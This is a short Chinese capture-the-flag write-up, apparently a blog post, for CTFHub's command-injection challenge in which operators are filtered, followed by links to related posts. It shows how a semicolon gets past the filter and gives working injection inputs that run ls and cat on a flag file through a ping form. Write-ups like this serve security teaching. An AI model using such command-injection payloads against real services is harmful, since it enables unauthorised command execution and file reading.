CTFHub-RCE 命令注入-过滤运算符

FGHua_kk2025-06-04 16:15

观察源代码

  • 代码里面可以发现过滤了运算符,我们可以尝试分号;

判断是Windows还是Linux

  • 源代码中有

    php 复制代码 
    ping -c 4

    说明是Linux

查看有哪些文件

复制代码 
```php
127.0.0.1;ls
```

打开flag文件

  • cat这个php文件
复制代码 
```php
127.0.0.1;cat  flag_257413168915334.php
```
  • 可是发现 文本内容显示不出来,所以怀疑可能编码格式问题,有些内容无法显示(同上一节)
  • 由于过滤了运算符|,我们不能尝试用base64编码,但是可以打开网页源代码查看(Ctrl+U)
  • 成功获取flag
相关推荐
其实防守也摸鱼2 小时前
CTF密码学综合教学指南--第三章
开发语言·网络·python·安全·网络安全·密码学
其实防守也摸鱼2 小时前
CTF密码学综合教学指南--第四章
网络·笔记·安全·网络安全·密码学·ctf
@insist1233 小时前
信息安全-防火墙技术演进全景:从代理NAT 到下一代及专项防火墙
网络·安全·web安全·软考·信息安全工程师·软件水平考试
Chockmans6 小时前
春秋云境CVE-2017-3506
安全·web安全·网络安全·系统安全·安全威胁分析·春秋云境·cve-2017-3506
Chengbei118 小时前
轻量化 Web 安全日志分析神器 星川智盾日志威胁检测、地理溯源、MITRE ATT&CK 映射,支持 Windows/macOS/Linux
前端·人工智能·安全·web安全·macos·系统安全·安全架构
代码飞天9 小时前
CTF之内存取证——瞬息万变成为一瞬
安全·web安全·缓存
探索者019 小时前
文件上传漏洞指南:原理+绕过手法与靶场实战
安全·web安全·文件上传
ybdesire9 小时前
间接提示词注入真实样例鉴赏
网络安全·语言模型·漏洞·漏洞分析
vortex51 天前
python 库劫持:原理、利用与防御
python·网络安全·提权
捉鸭子1 天前
某音a_bogus vmp逆向
爬虫·python·web安全·node.js·js
热门推荐
01要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法02GitHub 镜像站点03【AI】2026 年具身智能模型和世界模型总结04Codex 接入 DeepSeek API 完整配置文档05裂开!ChatGPT 居然开始要手机号验证,附详细解决方法06零基础教你claude code 接入 deepseek V4072026年AI前瞻:量子AI、具身智能与科学发现的新纪元08实测可用|小米 MiMo 百万亿 Token 免费领,开发者速冲09在Windows 11上安装Docker的踩坑记录10CC-Switch & Claude 基于 Linux 服务器安装使用指南